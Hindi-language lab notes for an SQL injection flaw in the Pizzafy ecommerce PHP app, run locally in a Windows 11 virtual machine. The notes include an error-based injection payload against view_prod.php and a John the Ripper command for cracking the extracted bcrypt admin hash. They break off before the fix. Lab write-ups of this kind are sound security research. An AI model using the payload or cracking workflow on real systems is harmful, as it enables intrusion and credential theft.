
cve-2026-7228 के लिए शोध संसाधन
cve-2026-7228 के लिए शोध संसाधन
वर्चुअल-बॉक्स की स्थापना: https://www.virtualbox.org/wiki/Downloads
https://www.microsoft.com/it-it/software-download/windows11
https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html
CVE भेद्यता: https://nvd.nist.gov/vuln/detail/CVE-2026-7228
एक्सप्लॉइट और समाधान के लिए GitHub: https://github.com/fernando-mengali/vulndb-submissions.git
पिज़ाफ़ी प्रोजेक्ट को निकालें और फ़ोल्डर को XAMPP में Apache के htdocs में ले जाएँ
पिज़ाफ़ी वेबसाइट: http://localhost/pizzafy/Pizzafy/
एडमिन लॉगिन: http://localhost/pizzafy/Pizzafy/admin/login.php
क्रेडेंशियल → उपयोगकर्ता नाम: [email protected] पासवर्ड: admin123
विशेष रूप से SQL इंजेक्शन एरर-बेस्ड जो XML में त्रुटि लौटाता है
पहले GET विधि से : http://localhost/Pizzafy/pizzafy/view_prod.php?id=
9%20AND%20extractvalue(rand(),%20concat(0x7e,version()))%20--

प्रोग्रामिंग भाषा: ==python==
प्रयुक्त लाइब्रेरी: request import request
एक्सप्लॉइट फ़ाइल: /script/test.py
test.py का निष्पादन
आउटपुट:

हैश वैल्यू से पासवर्ड डिक्रिप्ट करने के लिए जॉन द रिपर की स्थापना। काली जैसे ऑपरेटिंग सिस्टम के लिए यह टूल पहले से स्थापित है।
पासवर्ड को txt फ़ाइल में सहेजें: hash.txt
rockyou.txt फ़ाइल की स्थापना: git clone https://gitlab.com/kalilinux/packages/wordlists.git
gunzip rockyou.txt.gz
एन्क्रिप्टेड पासवर्ड का प्रकार: ==bcrypt==
वर्डलिस्ट फ़ाइल के साथ टूल का निष्पादन: john --wordlist=rockyou.txt --format=bcrypt hash.txt
आउटपुट:

पासवर्ड: admin123
वर्चुअल-बॉक्स खोलें और विंडोज 11 की वर्चुअल मशीन के लिए केवल-होस्ट के माध्यम से एक आईपी पता सेट करें


विंडोज 11 मशीन शुरू करें और जाँचें कि आईपी पता सही तरीके से सेट हुआ है या नहीं
टाइप करें: ipconfig

Apache और MySQL शुरू करें

python3 exploit.py
pizzafy/Pizzafy खोलें और view_prod.php फ़ाइल ढूँढें और निम्नलिखित भाग खोजें:


